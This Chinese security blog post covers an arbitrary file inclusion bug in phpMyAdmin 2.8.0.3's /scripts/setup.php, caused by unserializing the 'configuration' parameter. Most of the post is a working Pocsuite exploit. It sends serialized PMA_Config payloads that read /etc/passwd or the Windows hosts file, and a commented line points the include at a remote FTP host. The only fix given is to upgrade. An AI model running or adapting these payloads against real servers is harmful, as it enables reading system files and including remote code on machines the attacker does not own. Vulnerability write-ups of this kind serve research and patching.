您的足迹:首页 > 技术文章 >Phpmyadmin2.8.0.3任意文件包含漏洞

Phpmyadmin2.8.0.3任意文件包含漏洞

0x01 代码审计
漏洞的文件 /scripts/setup.php 第10行和第28行:

传入的configuration给反序列化,而这个setup.php中引入了common.lib.php
来到common.lib.php第555行:

common.lib.php中引入了Config.class.php

再看看Config.class.php 284行:

最后load方法:

0x02 漏洞复现
POC:


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re
 
class TestPOC(POCBase):
vulID = '1' # ssvid
version = '1.0'
author = ['whoam1']
vulDate = '2016-04-23'
createDate = '2016-08-24'
updateDate = '2016-08-24'
references = ['http://www.seebug.org/vuldb/ssvid-']
name = 'phpmyadmin unserialize getshell'
appPowerLink = 'https://www.phpmyadmin.net/'
appName = 'phpmyadmin'
appVersion = '2.8.0.3'
vulType = '文件包含'
desc = '''
/scripts/setup.php
'''
samples = ['']
install_requires = ['']
 #请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
 
 def _attack(self):
 #configuration=O:10:"PMA_Config":1:{s:6:"source",s:38:"ftp://user:[email protected]/ftp.txt";}&action=test
 self._verify()
 
 def _verify(self):
result = {}
requ = req.get(self.url)
coo = re.compile(r"'phpMyAdmin=(.*?);")
cookie = coo.findall(str(requ.headers))[0]
flag = re.compile(r"erver': '(.*?)',")
flags = flag.findall(str(requ.headers))[0]
vul_url = self.url+'/scripts/setup.php'
header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','cookie':'phpMyAdmin='+str(cookie),'Content-Type': 'application/x-www-form-urlencoded','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'}
 if '(' in flags:
poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'
req_post = req.post(vul_url,headers=header,data=poc)
 if '/bin/bash' in req_post.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
 return self.parse_output(result)
 else:
poc = 'configuration=O:10:"PMA_Config":1:{s:6:"source",s:37:"c:/windows/system32/drivers/etc/hosts";}&action=test'
req_post = req.post(vul_url,headers=header,data=poc)
 if 'Windows' in req_post.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
 return self.parse_output(result)
 
 def parse_output(self, result):
 #parse output
output = Output(self)
 if result:
output.success(result)
 else:
output.fail('Internet nothing returned')
 return output
 
 
register(TestPOC)


0x03 修复方案
升级为最新版本

本博客所有文章如无特别注明均为原创。作者:老王复制或转载请以超链接形式注明转自 极客中国-关注黑客与极客!
原文地址《Phpmyadmin2.8.0.3任意文件包含漏洞

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)